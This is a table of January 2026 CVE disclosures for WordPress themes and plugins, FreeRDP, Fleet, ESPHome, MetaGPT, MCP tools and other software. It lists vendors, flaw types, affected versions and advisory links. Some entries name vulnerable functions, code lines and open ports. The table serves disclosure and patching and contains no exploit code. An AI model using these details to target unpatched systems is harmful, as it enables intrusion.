| Edge-Themes--Overworld | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Edge-Themes Overworld overworld allows PHP Local File Inclusion. This issue affects Overworld: from n/a through <= 1.3. | 2026-01-22 | not yet calculated | CVE-2025-69050 | https://patchstack.com/database/Wordpress/Theme/overworld/vulnerability/wordpress-overworld-theme-1-3-local-file-inclusion-vulnerability?_s_id=cve |
| Elated-Themes--Laurent | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Laurent laurent allows PHP Local File Inclusion. This issue affects Laurent: from n/a through <= 3.1. | 2026-01-23 | not yet calculated | CVE-2026-24609 | https://patchstack.com/database/Wordpress/Theme/laurent/vulnerability/wordpress-laurent-theme-3-1-local-file-inclusion-vulnerability?_s_id=cve |
| Elated-Themes--Laurent Core | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Laurent Core laurent-core allows PHP Local File Inclusion. This issue affects Laurent Core: from n/a through <= 2.4.1. | 2026-01-23 | not yet calculated | CVE-2026-24608 | https://patchstack.com/database/Wordpress/Plugin/laurent-core/vulnerability/wordpress-laurent-core-plugin-2-4-1-local-file-inclusion-vulnerability?_s_id=cve |
| Elated-Themes--Search & Go | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Search & Go search-and-go allows PHP Local File Inclusion. This issue affects Search & Go: from n/a through <= 2.8. | 2026-01-22 | not yet calculated | CVE-2025-69005 | https://patchstack.com/database/Wordpress/Theme/search-and-go/vulnerability/wordpress-search-go-theme-2-8-local-file-inclusion-vulnerability?_s_id=cve |
| Elated-Themes--Sweet Jane | Authorization Bypass Through User-Controlled Key vulnerability in Elated-Themes Sweet Jane sweetjane allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Sweet Jane: from n/a through <= 1.2. | 2026-01-22 | not yet calculated | CVE-2026-22426 | https://patchstack.com/database/Wordpress/Theme/sweetjane/vulnerability/wordpress-sweet-jane-theme-1-2-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Elated-Themes--Töbel | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Töbel tobel allows PHP Local File Inclusion. This issue affects Töbel: from n/a through <= 1.6. | 2026-01-22 | not yet calculated | CVE-2025-69049 | https://patchstack.com/database/Wordpress/Theme/tobel/vulnerability/wordpress-toebel-theme-1-6-local-file-inclusion-vulnerability?_s_id=cve |
| Elated-Themes--The Aisle | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes The Aisle theaisle allows PHP Local File Inclusion. This issue affects The Aisle: from n/a through < 2.9.1. | 2026-01-22 | not yet calculated | CVE-2025-67941 | https://patchstack.com/database/Wordpress/Theme/theaisle/vulnerability/wordpress-the-aisle-theme-2-9-1-local-file-inclusion-vulnerability?_s_id=cve |
| Element Invader--Element Invader – Template Kits for Elementor | Missing Authorization vulnerability in Element Invader Element Invader – Template Kits for Elementor elementinvader allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Element Invader – Template Kits for Elementor: from n/a through <= 1.2.4. | 2026-01-22 | not yet calculated | CVE-2026-24386 | https://patchstack.com/database/Wordpress/Plugin/elementinvader/vulnerability/wordpress-element-invader-template-kits-for-elementor-plugin-1-2-4-broken-access-control-vulnerability?_s_id=cve |
| Enel X--JuiceBox 40 | Enel X JuiceBox 40 Telnet Service Missing Authentication Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Enel X JuiceBox 40 charging stations. Authentication is not required to exploit this vulnerability. The specific flaw exists within the telnet service, which listens on TCP port 2000 by default. The issue results from the lack of authentication prior to allowing remote connections. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-23285. | 2026-01-23 | not yet calculated | CVE-2026-0778 | ZDI-26-041 |
| esphome--esphome | ESPHome is a system to control microcontrollers remotely through Home Automation systems. In versions 2025.9.0 through 2025.12.6, an integer overflow in the API component's protobuf decoder allows denial-of-service attacks when API encryption is not used. The bounds check `ptr + field_length > end` in `components/api/proto.cpp` can wrap around when a malicious client sends a large `field_length` value: the pointer arithmetic overflows, the comparison passes, and the decoder reads past the end of the buffer. This affects all ESPHome device platforms (ESP32, ESP8266, RP2040, LibreTiny). The invalid memory read crashes the device. When using the plaintext API protocol, this attack can be performed without authentication. When noise encryption is enabled, knowledge of the encryption key is required. Users should upgrade to ESPHome 2025.12.7 or later to receive a patch, enable API encryption with a unique key per device, and follow the Security Best Practices. | 2026-01-19 | not yet calculated | CVE-2026-23833 | https://github.com/esphome/esphome/security/advisories/GHSA-4h3h-63v6-88qx https://github.com/esphome/esphome/pull/13306 https://github.com/esphome/esphome/commit/69d7b6e9210390051318bd8e6410727689de08d6 https://esphome.io/guides/security_best_practices |
| Essekia--Tablesome | Missing Authorization vulnerability in Essekia Tablesome tablesome allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Tablesome: from n/a through <= 1.1.35.2. | 2026-01-23 | not yet calculated | CVE-2026-24524 | https://patchstack.com/database/Wordpress/Plugin/tablesome/vulnerability/wordpress-tablesome-plugin-1-1-35-2-broken-access-control-vulnerability?_s_id=cve |
| Event Espresso--Event Espresso 4 Decaf | Missing Authorization vulnerability in Event Espresso Event Espresso 4 Decaf event-espresso-decaf allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Event Espresso 4 Decaf: from n/a through <= 5.0.37.decaf. | 2026-01-22 | not yet calculated | CVE-2025-68007 | https://patchstack.com/database/Wordpress/Plugin/event-espresso-decaf/vulnerability/wordpress-event-espresso-4-decaf-plugin-5-0-37-decaf-settings-change-vulnerability?_s_id=cve |
| EVerest--everest-core | EVerest is an EV charging software stack. Prior to version 2025.12.0, `is_message_crc_correct` in the DZG_GSH01 powermeter SLIP parser reads `vec[vec.size()-1]` and `vec[vec.size()-2]` without checking that at least two bytes are present. Malformed SLIP frames on the serial link can reach `is_message_crc_correct` with `vec.size() < 2` (only via the multi-message path), causing an out-of-bounds read before CRC verification and `pop_back` underflow. Therefore, an attacker controlling the serial input can reliably crash the process. Version 2025.12.0 fixes the issue. | 2026-01-21 | not yet calculated | CVE-2025-68132 | https://github.com/EVerest/everest-core/security/advisories/GHSA-79gc-m8w6-9hx5 https://github.com/EVerest/everest-core/commit/b8139b95144e3fe0082789b7fafe4e532ee494a1 |
| ExpressTech Systems--Quiz And Survey Master | Missing Authorization vulnerability in ExpressTech Systems Quiz And Survey Master quiz-master-next allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Quiz And Survey Master: from n/a through <= 10.3.3. | 2026-01-22 | not yet calculated | CVE-2026-24358 | https://patchstack.com/database/Wordpress/Plugin/quiz-master-next/vulnerability/wordpress-quiz-and-survey-master-plugin-10-3-3-broken-access-control-vulnerability?_s_id=cve |
| expresstechsoftware--MemberPress Discord Addon | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in expresstechsoftware MemberPress Discord Addon expresstechsoftwares-memberpress-discord-add-on allows Reflected XSS. This issue affects MemberPress Discord Addon: from n/a through <= 1.1.4. | 2026-01-22 | not yet calculated | CVE-2025-68838 | https://patchstack.com/database/Wordpress/Plugin/expresstechsoftwares-memberpress-discord-add-on/vulnerability/wordpress-memberpress-discord-addon-plugin-1-1-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| external-secrets--external-secrets | External Secrets Operator reads information from a third-party service and automatically injects the values as Kubernetes Secrets. Starting in version 0.20.2 and prior to version 1.2.0, the `getSecretKey` template function, while introduced for the senhasegura DevOps Secrets Management (DSM) provider, has the ability to fetch secrets cross-namespace with the roleBinding of the external-secrets controller, bypassing the project's security mechanisms. This function was completely removed in version 1.2.0, as everything done with that templating function can be done in a different way while respecting External Secrets Operator's safeguards. As a workaround, use a policy engine such as Kubernetes, Kyverno, Kubewarden, or OPA to prevent the usage of `getSecretKey` in any ExternalSecret resource. | 2026-01-21 | not yet calculated | CVE-2026-22822 | https://github.com/external-secrets/external-secrets/security/advisories/GHSA-77v3-r3jw-j2v2 https://github.com/external-secrets/external-secrets/issues/5690 https://github.com/external-secrets/external-secrets/pull/3895 https://github.com/external-secrets/external-secrets/commit/17d3e22b8d3fbe339faf8515a95ec06ec92b1feb https://github.com/external-secrets/external-secrets/releases/tag/v1.2.0 |
| extremeidea--bidorbuy Store Integrator | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in extremeidea bidorbuy Store Integrator bidorbuystoreintegrator allows Reflected XSS. This issue affects bidorbuy Store Integrator: from n/a through <= 2.12.0. | 2026-01-22 | not yet calculated | CVE-2025-68883 | https://patchstack.com/database/Wordpress/Plugin/bidorbuystoreintegrator/vulnerability/wordpress-bidorbuy-store-integrator-plugin-2-12-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Farost--Energia | Unrestricted Upload of File with Dangerous Type vulnerability in Farost Energia energia allows Upload a Web Shell to a Web Server. This issue affects Energia: from n/a through <= 1.1.2. | 2026-01-22 | not yet calculated | CVE-2025-50002 | https://patchstack.com/database/Wordpress/Theme/energia/vulnerability/wordpress-energia-theme-1-1-2-arbitrary-file-upload-vulnerability?_s_id=cve |
| favethemes--Homey Core | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in favethemes Homey Core homey-core allows Reflected XSS. This issue affects Homey Core: from n/a through <= 2.4.3. | 2026-01-22 | not yet calculated | CVE-2025-67964 | https://patchstack.com/database/Wordpress/Plugin/homey-core/vulnerability/wordpress-homey-core-plugin-2-4-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| favethemes--Houzez Theme - Functionality | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in favethemes Houzez Theme - Functionality houzez-theme-functionality allows Stored XSS. This issue affects Houzez Theme - Functionality: from n/a through <= 4.2.6. | 2026-01-22 | not yet calculated | CVE-2026-24355 | https://patchstack.com/database/Wordpress/Plugin/houzez-theme-functionality/vulnerability/wordpress-houzez-theme-functionality-plugin-4-2-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| FireStorm Plugins--FireStorm Professional Real Estate | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in FireStorm Plugins FireStorm Professional Real Estate fs-real-estate-plugin allows Blind SQL Injection. This issue affects FireStorm Professional Real Estate: from n/a through <= 2.7.11. | 2026-01-22 | not yet calculated | CVE-2026-22470 | https://patchstack.com/database/Wordpress/Plugin/fs-real-estate-plugin/vulnerability/wordpress-firestorm-professional-real-estate-plugin-2-7-11-sql-injection-vulnerability?_s_id=cve |
| fleetdm--fleet | fleetdm/fleet is open source device management software. Prior to versions 4.78.2, 4.77.1, 4.76.2, 4.75.2, and 4.53.3, if Windows MDM is enabled, an unauthenticated attacker can exploit this XSS vulnerability to steal a Fleet administrator's authentication token (FLEET::auth_token) from localStorage. This could allow unauthorized access to Fleet, including administrative access, visibility into device data, and modification of configuration. Versions 4.78.2, 4.77.1, 4.76.2, 4.75.2, and 4.53.3 fix the issue. If an immediate upgrade is not possible, affected Fleet users should temporarily disable Windows MDM. | 2026-01-21 | not yet calculated | CVE-2026-22808 | https://github.com/fleetdm/fleet/security/advisories/GHSA-gfpw-jgvr-cw4j |
| fleetdm--fleet | Fleet is open source device management software. A broken access control issue in versions prior to 4.78.3, 4.77.1, 4.76.2, 4.75.2, and 4.53.3 allowed authenticated users to access debug and profiling endpoints regardless of role. As a result, low-privilege users could view internal server diagnostics and trigger resource-intensive profiling operations. Fleet's debug/pprof endpoints are accessible to any authenticated user regardless of role, including the lowest-privilege "Observer" role. This allows low-privilege users to access sensitive server internals, including runtime profiling data and in-memory application state, and to trigger CPU-intensive profiling operations that could lead to denial of service. Versions 4.78.3, 4.77.1, 4.76.2, 4.75.2, and 4.53.3 fix the issue. If an immediate upgrade is not possible, users should put the debug/pprof endpoints behind an IP allowlist as a workaround. | 2026-01-21 | not yet calculated | CVE-2026-23517 | https://github.com/fleetdm/fleet/security/advisories/GHSA-4r5r-ccr6-q6f6 https://github.com/fleetdm/fleet/commit/5c030e32a3a9bc512355b5e1bf19636e4e6d0317 |
| fleetdm--fleet | Fleet is open source device management software. In versions prior to 4.78.3, 4.77.1, 4.76.2, 4.75.2, and 4.53.3, a vulnerability in Fleet's Windows MDM enrollment flow could allow an attacker to submit forged authentication tokens that are not properly validated. Because JWT signatures were not verified, Fleet could accept attacker-controlled identity claims, enabling enrollment of unauthorized devices under arbitrary Azure AD user identities. Versions 4.78.3, 4.77.1, 4.76.2, 4.75.2, and 4.53.3 fix the issue. If an immediate upgrade is not possible, affected Fleet users should temporarily disable Windows MDM. | 2026-01-21 | not yet calculated | CVE-2026-23518 | https://github.com/fleetdm/fleet/security/advisories/GHSA-63m5-974w-448v https://github.com/fleetdm/fleet/commit/e225ef57912c8f4ac8977e24b5ebe1d9fd875257 |
| flexostudio--flexo-posts-manager | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in flexostudio flexo-posts-manager flexo-posts-manager allows Reflected XSS. This issue affects flexo-posts-manager: from n/a through <= 1.0001. | 2026-01-22 | not yet calculated | CVE-2025-52762 | https://patchstack.com/database/Wordpress/Plugin/flexo-posts-manager/vulnerability/wordpress-flexo-posts-manager-plugin-1-0001-cross-site-scripting-xss-vulnerability?_s_id=cve |
| FmeAddons--Registration & Login with Mobile Phone Number for WooCommerce | Missing Authorization vulnerability in FmeAddons Registration & Login with Mobile Phone Number for WooCommerce registration-login-with-mobile-phone-number allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Registration & Login with Mobile Phone Number for WooCommerce: from n/a through <= 1.3.1. | 2026-01-22 | not yet calculated | CVE-2025-69052 | https://patchstack.com/database/Wordpress/Plugin/registration-login-with-mobile-phone-number/vulnerability/wordpress-registration-login-with-mobile-phone-number-for-woocommerce-plugin-1-2-9-broken-access-control-vulnerability?_s_id=cve |
| FooEvents--FooEvents for WooCommerce | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in FooEvents FooEvents for WooCommerce fooevents allows SQL Injection. This issue affects FooEvents for WooCommerce: from n/a through <= 1.20.4. | 2026-01-22 | not yet calculated | CVE-2025-69045 | https://patchstack.com/database/Wordpress/Plugin/fooevents/vulnerability/wordpress-fooevents-for-woocommerce-plugin-1-20-4-sql-injection-vulnerability?_s_id=cve |
| foreverpinetree--TheNa | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in foreverpinetree TheNa thena allows Reflected XSS. This issue affects TheNa: from n/a through <= 1.5.5. | 2026-01-22 | not yet calculated | CVE-2025-67614 | https://patchstack.com/database/Wordpress/Theme/thena/vulnerability/wordpress-thena-theme-1-5-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Foundation Agents--MetaGPT | Foundation Agents MetaGPT deserialize_message Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foundation Agents MetaGPT. Authentication is not required to exploit this vulnerability. The specific flaw exists within the deserialize_message function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28121. | 2026-01-23 | not yet calculated | CVE-2026-0760 | ZDI-26-026 |
| Foundation Agents--MetaGPT | Foundation Agents MetaGPT actionoutput_str_to_mapping Code Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foundation Agents MetaGPT. Authentication is not required to exploit this vulnerability. The specific flaw exists within the actionoutput_str_to_mapping function. The issue results from the lack of proper validation of a user-supplied string before using it to execute Python code. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28124. | 2026-01-23 | not yet calculated | CVE-2026-0761 | ZDI-26-027 |
| Framelink--Figma MCP Server | Framelink Figma MCP Server fetchWithRetry Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Framelink Figma MCP Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the fetchWithRetry method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-27877. | 2026-01-23 | not yet calculated | CVE-2025-15061 | ZDI-25-1197 vendor-provided URL |
| Frank Corso--Quote Master | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Frank Corso Quote Master quote-master allows Reflected XSS. This issue affects Quote Master: from n/a through <= 7.1.1. | 2026-01-22 | not yet calculated | CVE-2025-68849 | https://patchstack.com/database/Wordpress/Plugin/quote-master/vulnerability/wordpress-quote-master-plugin-7-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| franklioxygen--MyTube | MyTube is a self-hosted downloader and player for several video websites. Versions 1.7.78 and below do not safeguard against authorization bypass, allowing guest users to download the complete application database. The application fails to properly validate user permissions on the database export endpoint, enabling low-privileged users to access sensitive data they should not have permission to view. | 2026-01-23 | not yet calculated | CVE-2026-24139 | https://github.com/franklioxygen/MyTube/security/advisories/GHSA-hhc3-8q8c-89q7 https://github.com/franklioxygen/MyTube/commit/e271775e27d51b26e54731b7b874447f47a1f280 |
| Free5GC--Free5GC | An issue was discovered in Free5gc NRF 1.4.0. In the access-token generation logic of free5GC, the AccessTokenScopeCheck() function in file internal/sbi/processor/access_token.go bypasses all scope validation when the attacker uses a crafted targetNF value. This allows attackers to obtain an access token with any arbitrary scope. | 2026-01-23 | not yet calculated | CVE-2025-66719 | https://github.com/free5gc/free5gc/issues/736 https://github.com/free5gc/nrf/pull/73 |
| Free5GC--Free5GC | Null pointer dereference in free5gc pcf 1.4.0 in file internal/sbi/processor/ampolicy.go in function HandleDeletePoliciesPolAssoId. | 2026-01-23 | not yet calculated | CVE-2025-66720 | https://github.com/free5gc/free5gc/issues/726 https://github.com/free5gc/pcf/pull/57 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to version 3.21.0, `freerdp_bitmap_decompress_planar` does not validate `nSrcWidth`/`nSrcHeight` against `planar->maxWidth`/`maxHeight` before RLE decode. A malicious server can trigger a client‑side heap buffer overflow, causing a crash (DoS) and potential heap corruption with code‑execution risk depending on allocator behavior and surrounding heap layout. Version 3.21.0 contains a patch for the issue. | 2026-01-19 | not yet calculated | CVE-2026-23530 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-r4hv-852m-fq7p https://github.com/FreeRDP/FreeRDP/blob/38514dfa5813aa945a86cfbcec279033f8394468/libfreerdp/codec/planar.c#L1689-L1696 https://github.com/FreeRDP/FreeRDP/blob/38514dfa5813aa945a86cfbcec279033f8394468/libfreerdp/codec/planar.c#L1713-L1716 https://github.com/FreeRDP/FreeRDP/blob/38514dfa5813aa945a86cfbcec279033f8394468/libfreerdp/codec/planar.c#L951-L953 https://github.com/FreeRDP/FreeRDP/releases/tag/3.21.0 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to version 3.21.0, in ClearCodec, when `glyphData` is present, `clear_decompress` calls `freerdp_image_copy_no_overlap` without validating the destination rectangle, allowing an out-of-bounds read/write via crafted RDPGFX surface updates. A malicious server can trigger a client‑side heap buffer overflow, causing a crash (DoS) and potential heap corruption with code‑execution risk depending on allocator behavior and surrounding heap layout. Version 3.21.0 contains a patch for the issue. | 2026-01-19 | not yet calculated | CVE-2026-23531 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-xj5h-9cr5-23c5 https://github.com/FreeRDP/FreeRDP/blob/38514dfa5813aa945a86cfbcec279033f8394468/libfreerdp/codec/clear.c#L1139-L1145 https://github.com/FreeRDP/FreeRDP/releases/tag/3.21.0 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to version 3.21.0, a client-side heap buffer overflow occurs in the FreeRDP client's `gdi_SurfaceToSurface` path due to a mismatch between destination rectangle clamping and the actual copy size. A malicious server can trigger a client‑side heap buffer overflow, causing a crash (DoS) and potential heap corruption with code‑execution risk depending on allocator behavior and surrounding heap layout. Version 3.21.0 contains a patch for the issue. | 2026-01-19 | not yet calculated | CVE-2026-23532 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-fq8c-87hj-7gvr https://github.com/FreeRDP/FreeRDP/blob/38514dfa5813aa945a86cfbcec279033f8394468/libfreerdp/gdi/gfx.c#L1368-L1382 https://github.com/FreeRDP/FreeRDP/releases/tag/3.21.0 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to version 3.21.0, a client-side heap buffer overflow occurs in the RDPGFX ClearCodec decode path when maliciously crafted residual data causes out-of-bounds writes during color output. A malicious server can trigger a client‑side heap buffer overflow, causing a crash (DoS) and potential heap corruption with code‑execution risk depending on allocator behavior and surrounding heap layout. Version 3.21.0 contains a patch for the issue. | 2026-01-19 | not yet calculated | CVE-2026-23533 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-32q9-m5qr-9j2v https://github.com/FreeRDP/FreeRDP/blob/38514dfa5813aa945a86cfbcec279033f8394468/libfreerdp/codec/clear.c#L268-L281 https://github.com/FreeRDP/FreeRDP/blob/38514dfa5813aa945a86cfbcec279033f8394468/libfreerdp/codec/clear.c#L336 https://github.com/FreeRDP/FreeRDP/releases/tag/3.21.0 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to version 3.21.0, a client-side heap buffer overflow occurs in the ClearCodec bands decode path when crafted band coordinates allow writes past the end of the destination surface buffer. A malicious server can trigger a client‑side heap buffer overflow, causing a crash (DoS) and potential heap corruption with code‑execution risk depending on allocator behavior and surrounding heap layout. Version 3.21.0 contains a patch for the issue. | 2026-01-19 | not yet calculated | CVE-2026-23534 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-3frr-mp8w-4599 https://github.com/FreeRDP/FreeRDP/blob/38514dfa5813aa945a86cfbcec279033f8394468/libfreerdp/codec/clear.c#L878-L879 https://github.com/FreeRDP/FreeRDP/blob/38514dfa5813aa945a86cfbcec279033f8394468/libfreerdp/codec/clear.c#L883-L884 https://github.com/FreeRDP/FreeRDP/releases/tag/3.21.0 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to version 3.21.0, FastGlyph parsing trusts `cbData`/remaining length and never validates against the minimum size implied by `cx/cy`. A malicious server can trigger a client‑side global buffer overflow, causing a crash (DoS). Version 3.21.0 contains a patch for the issue. | 2026-01-19 | not yet calculated | CVE-2026-23732 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-7qxp-j2fj-c3pp https://github.com/FreeRDP/FreeRDP/blob/f96ee2a6dd02739325c2a4e36a14978b561f00ea/libfreerdp/cache/glyph.c#L463-L480 https://github.com/FreeRDP/FreeRDP/blob/f96ee2a6dd02739325c2a4e36a14978b561f00ea/libfreerdp/codec/color.c#L261-L277 https://github.com/FreeRDP/FreeRDP/blob/f96ee2a6dd02739325c2a4e36a14978b561f00ea/libfreerdp/core/graphics.c#L138 https://github.com/FreeRDP/FreeRDP/blob/f96ee2a6dd02739325c2a4e36a14978b561f00ea/libfreerdp/core/orders.c#L2186C17-L2199 https://github.com/FreeRDP/FreeRDP/releases/tag/3.21.0 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to version 3.21.0, `xf_Pointer_New` frees `cursorPixels` on failure, then `pointer_free` calls `xf_Pointer_Free` and frees it again, triggering ASan UAF. A malicious server can trigger a client‑side use after free, causing a crash (DoS) and potential heap corruption with code‑execution risk depending on allocator behavior and surrounding heap layout. Version 3.21.0 contains a patch for the issue. | 2026-01-19 | not yet calculated | CVE-2026-23883 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-qcrr-85qx-4p6x https://github.com/FreeRDP/FreeRDP/blob/3370e30e92a021eb680892dda14d642bc8b8727c/client/X11/xf_graphics.c#L312-L319 https://github.com/FreeRDP/FreeRDP/blob/3370e30e92a021eb680892dda14d642bc8b8727c/client/X11/xf_graphics.c#L340 https://github.com/FreeRDP/FreeRDP/blob/3370e30e92a021eb680892dda14d642bc8b8727c/libfreerdp/cache/pointer.c#L164-L174 https://github.com/FreeRDP/FreeRDP/releases/tag/3.21.0 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to version 3.21.0, offscreen bitmap deletion leaves `gdi->drawing` pointing to freed memory, causing UAF when related update packets arrive. A malicious server can trigger a client‑side use after free, causing a crash (DoS) and potential heap corruption with code‑execution risk depending on allocator behavior and surrounding heap layout. Version 3.21.0 contains a patch for the issue. | 2026-01-19 | not yet calculated | CVE-2026-23884 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-cfgj-vc84-f3pp https://github.com/FreeRDP/FreeRDP/blob/3370e30e92a021eb680892dda14d642bc8b8727c/libfreerdp/cache/offscreen.c#L114-L122 https://github.com/FreeRDP/FreeRDP/blob/3370e30e92a021eb680892dda14d642bc8b8727c/libfreerdp/cache/offscreen.c#L87-L91 https://github.com/FreeRDP/FreeRDP/releases/tag/3.21.0 |
| Fsas Technologies Inc.--ServerView Agents for Windows | The installer of ServerView Agents for Windows provided by Fsas Technologies Inc. may insecurely load Dynamic Link Libraries. Arbitrary code may be executed with the administrator privilege when the installer is executed. | 2026-01-21 | not yet calculated | CVE-2026-24016 | https://www.fsastech.com/ja-jp/resources/security/2026/0121.html https://jvn.jp/en/jp/JVN65211823/ |
| fuelthemes--North | Deserialization of Untrusted Data vulnerability in fuelthemes North north-wp allows Object Injection. This issue affects North: from n/a through <= 5.7.5. | 2026-01-22 | not yet calculated | CVE-2025-69099 | https://patchstack.com/database/Wordpress/Theme/north-wp/vulnerability/wordpress-north-theme-5-7-5-php-object-injection-vulnerability?_s_id=cve |
| fuelthemes--North | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in fuelthemes North north-wp allows PHP Local File Inclusion. This issue affects North: from n/a through <= 5.7.5. | 2026-01-22 | not yet calculated | CVE-2025-69100 | https://patchstack.com/database/Wordpress/Theme/north-wp/vulnerability/wordpress-north-theme-5-7-5-local-file-inclusion-vulnerability?_s_id=cve |
| fuelthemes--Werkstatt | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in fuelthemes Werkstatt werkstatt allows PHP Local File Inclusion. This issue affects Werkstatt: from n/a through < 4.8.3. | 2026-01-22 | not yet calculated | CVE-2025-69314 | https://patchstack.com/database/Wordpress/Theme/werkstatt/vulnerability/wordpress-werkstatt-theme-4-8-3-local-file-inclusion-vulnerability?_s_id=cve |
| fuelthemes--WerkStatt Plugin | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in fuelthemes WerkStatt Plugin werkstatt-plugin allows PHP Local File Inclusion. This issue affects WerkStatt Plugin: from n/a through <= 1.6.6. | 2026-01-22 | not yet calculated | CVE-2025-63017 | https://patchstack.com/database/Wordpress/Plugin/werkstatt-plugin/vulnerability/wordpress-werkstatt-plugin-plugin-1-6-6-local-file-inclusion-vulnerability?_s_id=cve |
| garidium--g-FFL Checkout | Unrestricted Upload of File with Dangerous Type vulnerability in garidium g-FFL Checkout g-ffl-checkout allows Upload a Web Shell to a Web Server. This issue affects g-FFL Checkout: from n/a through <= 2.1.0. | 2026-01-22 | not yet calculated | CVE-2025-68001 | https://patchstack.com/database/Wordpress/Plugin/g-ffl-checkout/vulnerability/wordpress-g-ffl-checkout-plugin-2-1-0-arbitrary-file-upload-vulnerability?_s_id=cve |
| Gemini MCP Tool--gemini-mcp-tool | gemini-mcp-tool execAsync Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of gemini-mcp-tool. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the execAsync method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-27783. | 2026-01-23 | not yet calculated | CVE-2026-0755 | ZDI-26-021 |
| gemsloyalty--gemsloyalty | A vulnerability in the PHP backend of gemsloyalty.aptsys.com.sg thru 2025-05-28 allows unauthenticated remote attackers to trigger detailed error messages that disclose internal file paths, code snippets, and stack traces. This occurs when specially crafted HTTP GET/POST requests are sent to public API endpoints, exposing potentially sensitive information useful for further exploitation. This issue is classified under CWE-209: Information Exposure Through an Error Message. | 2026-01-23 | not yet calculated | CVE-2025-52022 | http://aptsys.com https://gist.github.com/ReverseThatApp/4a6be2b9b2ba39d38c35c8753e0afd39 |
| gemsloyalty--gemsloyalty | A vulnerability in the PHP backend of gemscms.aptsys.com.sg thru 2025-05-28 allows unauthenticated remote attackers to trigger detailed error messages that disclose internal file paths, code snippets, and stack traces. This occurs when specially crafted HTTP GET/POST requests are sent to public API endpoints, exposing potentially sensitive information useful for further exploitation. This issue is classified under CWE-209: Information Exposure Through an Error Message. | 2026-01-23 | not yet calculated | CVE-2025-52023 | http://aptsys.com http://gemscms.com https://gist.github.com/ReverseThatApp/4a6be2b9b2ba39d38c35c8753e0afd39 |
